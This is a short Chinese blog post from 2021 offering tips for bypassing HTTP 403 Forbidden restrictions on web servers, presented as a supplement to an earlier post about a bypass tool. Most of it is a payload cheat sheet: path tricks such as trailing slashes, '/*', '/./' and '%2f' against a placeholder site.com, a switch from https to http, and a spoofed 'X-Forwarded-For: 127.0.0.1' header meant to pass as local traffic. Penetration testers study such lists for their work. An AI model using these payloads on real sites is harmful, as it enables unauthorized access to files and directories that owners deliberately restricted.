却月の博客


江湖赠剑青山远,回首百年付歌吟。

403bypass技巧

2021年2月4日 0条评论 89次阅读 1人点赞 却月
前言:针对前一个工具 403bypass神器的技巧补充

目录

如果看到目录末尾没有斜杠,那么在那里执行以下操作。

site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200

文件

如果在结尾看到没有任何斜杠的文件,那么在那里执行以下操作。

site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200

标题内容

这个不用多说,示例

https://site.com/secret => 403
http://site.com/secret => 200

一些payload

/
/*
/%2f/
/./
./.
/*/

XFF绕过

X-Forwarded-For: 127.0.0.1
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
点赞
最后编辑:2021年2月9日

发表评论

电子邮件地址不会被公开。必填项已用 * 标注